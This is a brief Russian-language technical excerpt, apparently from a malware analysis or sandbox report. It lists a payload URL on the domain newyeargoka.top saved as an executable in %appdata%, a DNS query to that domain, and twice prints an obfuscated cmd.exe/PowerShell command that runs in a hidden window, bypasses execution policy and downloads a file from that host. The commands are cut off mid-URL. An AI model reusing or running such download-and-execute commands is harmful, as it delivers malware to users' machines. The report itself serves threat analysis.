Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oweRs^H^E^LL.ex^E -^EX^ecUTI^o^Np^OL^i^cY BY^P^A^Ss ^-^n^o^pr^oFi^Le ^-W^i^ND^oWsT^Y^lE h^I^DD^EN^ (N^EW-^oBJect ^systeM.NeT^.w^Eb^C^Lie^nt^).^dOwNlOad^FiL^e^('http://newyear...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "P^oweRs^H^E^LL.ex^E -^EX^ecUTI^o^Np^OL^i^cY BY^P^A^Ss ^-^n^o^pr^oFi^Le ^-W^i^ND^oWsT^Y^lE h^I^DD^EN^ (N^EW-^oBJect ^systeM.NeT^.w^Eb^C^Lie^nt^).^dOwNlOad^FiL^e^('http://newyear...' (со скрытым окном)